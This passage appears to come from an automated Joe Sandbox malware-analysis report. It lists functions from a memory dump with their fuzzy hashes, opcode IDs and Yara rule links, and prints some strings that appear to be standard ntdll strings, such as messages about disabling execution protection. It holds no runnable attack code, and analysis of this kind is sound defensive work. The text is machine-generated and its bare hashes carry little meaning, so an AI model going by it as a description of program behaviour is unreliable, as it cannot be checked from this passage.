                                                                                                                      • Instruction ID: bc79facf807048ce3cc809e5729d5f1dfd4c3bc21dd73ac4a957d005259dfb79
                                                                                                                      • Opcode Fuzzy Hash: e4b2e2f1b46d62c3c494acef50193a2f208128c5fd19e3f7b7b141f96eab7ff3
                                                                                                                      • Instruction Fuzzy Hash: 24900222282441525545B1584484517401797F03517D5C462A1414964C85269956E623
                                                                                                                      Function 05772DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e0a9e46305da35f8c5795f75cb4ce9526dcb5e532284579fdf42ad2d09f3d8a1
                                                                                                                      • Instruction ID: 3f4e47725315608e8d1a531761750d8ef197bf0c4ce5954077e3ffeec0a3aebf
                                                                                                                      • Opcode Fuzzy Hash: e0a9e46305da35f8c5795f75cb4ce9526dcb5e532284579fdf42ad2d09f3d8a1
                                                                                                                      • Instruction Fuzzy Hash: 3190023228140402D14171584484616001A97E0351FD5C462A0424568E86558B56BA63
                                                                                                                      Function 05772C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8794ea43f24220c9393088aaa96dfb5c6b8812e596a470aa3848a25cd6864f84
                                                                                                                      • Instruction ID: 5ee7dfed6ecc09e0be6648ddc45329b5ed3c2c0dea207ff9c164de17275a308a
                                                                                                                      • Opcode Fuzzy Hash: 8794ea43f24220c9393088aaa96dfb5c6b8812e596a470aa3848a25cd6864f84
                                                                                                                      • Instruction Fuzzy Hash: E790023224140842D10071584484B56001687F0311FD5C466A0124668D8615C9517523
                                                                                                                      Function 05772CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e0c2d6ac02fc428cdffb79bfa6e182f71ec87443f0a19561a575bc0fed6194db
                                                                                                                      • Instruction ID: 9b3bb57011d9938f8cca2574ff5c99e29fc36e3445e6746c4e896b39d66ad33a
                                                                                                                      • Opcode Fuzzy Hash: e0c2d6ac02fc428cdffb79bfa6e182f71ec87443f0a19561a575bc0fed6194db
                                                                                                                      • Instruction Fuzzy Hash: B990023224140403D10071585588717001687E0311FD5D861A042456CDD65689517123
                                                                                                                      Function 05772CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9b3f4b0f3d254547569e2081499013a3c465f90763428632365a03c0e7f24507
                                                                                                                      • Instruction ID: 1fb2be978897c70f42b02ecaeb9170450def7ddba81dd52eac20eac23dccd83c
                                                                                                                      • Opcode Fuzzy Hash: 9b3f4b0f3d254547569e2081499013a3c465f90763428632365a03c0e7f24507
                                                                                                                      • Instruction Fuzzy Hash: 5990022264540402D14071585498716002687E0311FD5D461A0024568DC6598B5576A3
                                                                                                                      Function 05772CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b42355ddecf6d2dece835645223229cbe9cbc6c388199494c09cef18d9c33b51
                                                                                                                      • Instruction ID: 08c7414ab4993e3784f2a1b57e880df17c72a4fe431cb6467c08fcdcf5e72eeb
                                                                                                                      • Opcode Fuzzy Hash: b42355ddecf6d2dece835645223229cbe9cbc6c388199494c09cef18d9c33b51
                                                                                                                      • Instruction Fuzzy Hash: 6890023224140402D10075985488656001687F0311FD5D461A5024569EC66589917133
                                                                                                                      Function 05772F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7ba31487080f1d2d836c600ea6e4ce716866556ceaf56b30bbf5d6c1714ab9a3
                                                                                                                      • Instruction ID: fdafba2f745808948d8dd042e82a915a74afd7723ebcdc10bf2cc5ec06930bb4
                                                                                                                      • Opcode Fuzzy Hash: 7ba31487080f1d2d836c600ea6e4ce716866556ceaf56b30bbf5d6c1714ab9a3
                                                                                                                      • Instruction Fuzzy Hash: 7790026225140042D10471584484716005687F1311FD5C462A2154568CC5298D616127
                                                                                                                      Function 05772F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c719864ddbf3aef7fcc24cba6eb09983e6fefdb6fd8fdc5e9be126a79f7765d6
                                                                                                                      • Instruction ID: 576ba3fa2ed1b35ea7adc09690475bcbacc2736a91523fbaec2903b423cc0805
                                                                                                                      • Opcode Fuzzy Hash: c719864ddbf3aef7fcc24cba6eb09983e6fefdb6fd8fdc5e9be126a79f7765d6
                                                                                                                      • Instruction Fuzzy Hash: 5B90026238140442D10071584494B160016C7F1311FD5C465E1064568D8619CD527127
                                                                                                                      Function 05772FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8e4e3f16a7b124a432da1b068ea3ba37d893a39fe9383f8004ce0b92dd59a6da
                                                                                                                      • Instruction ID: c285c35f0f93eb03f7bdbadee325ed04774571871eca0df482b637eee26b0a81
                                                                                                                      • Opcode Fuzzy Hash: 8e4e3f16a7b124a432da1b068ea3ba37d893a39fe9383f8004ce0b92dd59a6da
                                                                                                                      • Instruction Fuzzy Hash: 49900222251C0042D20075684C94B17001687E0313FD5C565A0154568CC91589616523
                                                                                                                      Function 05772FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c1fb9f0e8c165aa127dd0e8252c82b3943ca349ee273b0f11a18ebbc419bb9fd
                                                                                                                      • Instruction ID: dc1d8eca999466c041bfbabaa22c916df1174f0807c60c44972f7cc2e8d4d031
                                                                                                                      • Opcode Fuzzy Hash: c1fb9f0e8c165aa127dd0e8252c82b3943ca349ee273b0f11a18ebbc419bb9fd
                                                                                                                      • Instruction Fuzzy Hash: DE900222641400424140716888C49164016ABF13217D5C571A0998564D855989656667
                                                                                                                      Function 05772FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 326d33b106cf5a46a4117a65f69dfc6a518ac575ced687bca04928d2ddeceb20
                                                                                                                      • Instruction ID: 312a96896a258c8fce4ccca07a52f2ff83b360fba98695eb6ab101e7ea5d62e6
                                                                                                                      • Opcode Fuzzy Hash: 326d33b106cf5a46a4117a65f69dfc6a518ac575ced687bca04928d2ddeceb20
                                                                                                                      • Instruction Fuzzy Hash: 6190023224180402D10071584888757001687E0312FD5C461A5164569E8665C9917533
                                                                                                                      Function 05772F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2630fa925b10f92b7ac612d74c2ee7f22dd9f4571025d79ae3d1d041524fb611
                                                                                                                      • Instruction ID: 416e55f51df3a6a4ddbb87b818ce4b5f002c70bf6d5a5168c1aa8949703e28d7
                                                                                                                      • Opcode Fuzzy Hash: 2630fa925b10f92b7ac612d74c2ee7f22dd9f4571025d79ae3d1d041524fb611
                                                                                                                      • Instruction Fuzzy Hash: 3C90023224180402D1007158489471B001687E0312FD5C461A1164569D862589517573
                                                                                                                      Function 05772E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4e4d6e58d2df08251cdbba7743521301729eb664587630475f653e4e53f0213
                                                                                                                      • Instruction ID: 6dd788750c41620cb57eaa94050e4255bf8ab61327dd89dee61c7f319020b5bd
                                                                                                                      • Opcode Fuzzy Hash: a4e4d6e58d2df08251cdbba7743521301729eb664587630475f653e4e53f0213
                                                                                                                      • Instruction Fuzzy Hash: 5D90022234140402D10271584494616001AC7E1355FD5C462E1424569D86258A53B133
                                                                                                                      Function 05772EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23db463c986a4ec1f88d5299a7d7470132dcee94a6d76f52d820e4c37466fe08
                                                                                                                      • Instruction ID: ae9749aa7277d11dd00bdc2f058f458949f045b6e0db72670a83e07527ab4e07
                                                                                                                      • Opcode Fuzzy Hash: 23db463c986a4ec1f88d5299a7d7470132dcee94a6d76f52d820e4c37466fe08
                                                                                                                      • Instruction Fuzzy Hash: 1E90026224180403D14075584884617001687E0312FD5C461A2064569E8A298D517137
                                                                                                                      Function 05772EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3bbcd0d268ae94ae1d4d251a58f1081bf87f1e259b0178da28a4fa4ee2d28720
                                                                                                                      • Instruction ID: 69fc11cd03f816874e3d1f91f2fba6494154f97d3158a5e0e7e1b781c9999467
                                                                                                                      • Opcode Fuzzy Hash: 3bbcd0d268ae94ae1d4d251a58f1081bf87f1e259b0178da28a4fa4ee2d28720
                                                                                                                      • Instruction Fuzzy Hash: 4B90027224140402D14071584484756001687E0311FD5C461A5064568E86598ED57667
                                                                                                                      Function 05772E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec20151fe715e7ca49cac85119d6befa3a291ff4f2267e5f044fb66de7d86fc
                                                                                                                      • Instruction ID: 140f5df97c74b345438ef9c3a1c3a81986e635208c2965d438dd790977bee21b
                                                                                                                      • Opcode Fuzzy Hash: eec20151fe715e7ca49cac85119d6befa3a291ff4f2267e5f044fb66de7d86fc
                                                                                                                      • Instruction Fuzzy Hash: 3190022264140502D10171584484626001B87E0351FD5C472A1024569ECA258A92B133
                                                                                                                      Function 057739B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2ae6174c9268daa781f30a883b706513291ae2d59f22f511637747c8cc51549b
                                                                                                                      • Instruction ID: 7409a261a26d8837361f739946971d5a3ba1afe7a38ad2f1042dd4089bbd3d2d
                                                                                                                      • Opcode Fuzzy Hash: 2ae6174c9268daa781f30a883b706513291ae2d59f22f511637747c8cc51549b
                                                                                                                      • Instruction Fuzzy Hash: 6590022228545102D150715C44846264016A7F0311FD5C471A08145A8D855589557223
                                                                                                                      Function 05772BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 031de46c86f561f97745602443fca33acb72d23ea8ea57060d0877eca0fa0a71
                                                                                                                      • Instruction ID: cb33229f743a78d9338f0a4698632c9b5496ac44617ae3881bc2f99395b10576
                                                                                                                      • Opcode Fuzzy Hash: 031de46c86f561f97745602443fca33acb72d23ea8ea57060d0877eca0fa0a71
                                                                                                                      • Instruction Fuzzy Hash: F390023224140802D1807158448465A001687E1311FD5C465A0025668DCA158B5977A3
                                                                                                                      Function 05772BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 555f5f48fadcd557deb00581a99281a841f91875ec330be39e1cf8d0e0dfa868
                                                                                                                      • Instruction ID: a63ffb1af3b7bb41cbf9df9542abe7da35a4f468b9a5e04541d94d9ba5e9a0fc
                                                                                                                      • Opcode Fuzzy Hash: 555f5f48fadcd557deb00581a99281a841f91875ec330be39e1cf8d0e0dfa868
                                                                                                                      • Instruction Fuzzy Hash: BF90023224544842D14071584484A56002687E0315FD5C461A00646A8D96258E55B663
                                                                                                                      Function 05772BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c4e7941bbf88306afb2dd4e1388691fc6957e3c4dc014e9276a9124752e4870e
                                                                                                                      • Instruction ID: ca6186e308a9414150749a26beb8bbde0cb93374e4c29dd8ab087879420f2dd6
                                                                                                                      • Opcode Fuzzy Hash: c4e7941bbf88306afb2dd4e1388691fc6957e3c4dc014e9276a9124752e4870e
                                                                                                                      • Instruction Fuzzy Hash: 8290023264540802D15071584494756001687E0311FD5C461A0024668D87558B5576A3
                                                                                                                      Function 05772B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f9f1b962571c2e9121a5ff7cd90bbdd9e0b6e2326da16c86defeefa5b2523fef
                                                                                                                      • Instruction ID: 0dfbacd20c9fbbd0f7a57bed3a8f707847e284be2b54a04f0fc43d3c5a70dec8
                                                                                                                      • Opcode Fuzzy Hash: f9f1b962571c2e9121a5ff7cd90bbdd9e0b6e2326da16c86defeefa5b2523fef
                                                                                                                      • Instruction Fuzzy Hash: 8A90023224140802D10471584884696001687E0311FD5C461A6024669E966589917133
                                                                                                                      Function 05772AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7fb03db8408721f35634234d8aed5b7406db4e57f5b9d462dcd7b1301a6ba20d
                                                                                                                      • Instruction ID: d3d2d84900a0070c09f5b68ca66be4f7e2db86c7734b760428c5f1aee6678b2f
                                                                                                                      • Opcode Fuzzy Hash: 7fb03db8408721f35634234d8aed5b7406db4e57f5b9d462dcd7b1301a6ba20d
                                                                                                                      • Instruction Fuzzy Hash: EC900226261400020145B558068451B045697E63613D5C465F14165A4CC62189656323
                                                                                                                      Function 05772AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bb1cfc9141006335122efef26ca130de1aa83b64a1bea2c2bb837392b800d488
                                                                                                                      • Instruction ID: c882c3b1d05d35b7b29354a357f5f86e084b849d22a493dd8828429cf9eab94c
                                                                                                                      • Opcode Fuzzy Hash: bb1cfc9141006335122efef26ca130de1aa83b64a1bea2c2bb837392b800d488
                                                                                                                      • Instruction Fuzzy Hash: DB900226251400030105B5580784517005787E53613D5C471F1015564CD62189616123
                                                                                                                      Function 05772AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8138abf86c151149058f40ee7c928934d1680ba11f7355f5a82947a2ccc8f408
                                                                                                                      • Instruction ID: 0bbcbf589dc70c78bd276698f4191f5087e770de1511c34aa1913c876d729fd4
                                                                                                                      • Opcode Fuzzy Hash: 8138abf86c151149058f40ee7c928934d1680ba11f7355f5a82947a2ccc8f408
                                                                                                                      • Instruction Fuzzy Hash: 069002A2241540924500B2588484B1A451687F0311BD5C466E1054574CC5258951A137
                                                                                                                      Function 05772C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: e26b55b52c711d075b14278a51e83280fefbff8cc674a5cb358c537f7c8b11a5
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Function 05772890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: 34911deefd8aa2600dd95b0c00568717f546a373f47c8147cb32e8977b54169d
                                                                                                                      • Instruction ID: 149201e05f71936017d3c429f0cd834130c84a874f7c985408d9cba6573e6cc3
                                                                                                                      • Opcode Fuzzy Hash: 34911deefd8aa2600dd95b0c00568717f546a373f47c8147cb32e8977b54169d
                                                                                                                      • Instruction Fuzzy Hash: 2551EBB6B0411ABFCF10DB98989497EF7F9BB482007548269E465E7642D334DE40EBA0
                                                                                                                      Function 05767630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • ExecuteOptions, xrefs: 057A46A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 057A4725
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 057A4742
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 057A46FC
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 057A4787
                                                                                                                      • Execute=1, xrefs: 057A4713
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 057A4655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: 78f5b32c3b2dd1516714cc0f90c557be57a82a8076554f4a36b4d451b0390711
                                                                                                                      • Instruction ID: 60c461cb42d8df51ac01443e8b4f34edec14caccd4245c1c872b3758d0fb08a6
                                                                                                                      • Opcode Fuzzy Hash: 78f5b32c3b2dd1516714cc0f90c557be57a82a8076554f4a36b4d451b0390711
                                                                                                                      • Instruction Fuzzy Hash: 72512971700219BAEF15DE68DC8DFED77A9FF44348F0401A9E905AB180EB719A41EF51
                                                                                                                      Function 0577B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: 4aab165beb7d1c4c815ba071ac90fd054bbb20ef26fbc1c60bbe6f380f02c507
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 7F81F770E0524D9EDF24CF68E8907FEBBB2BF45310F18465AD8A9E7291E7309840E794
                                                                                                                      Function 0576BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 057A7B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 057A7B8E
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A7BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
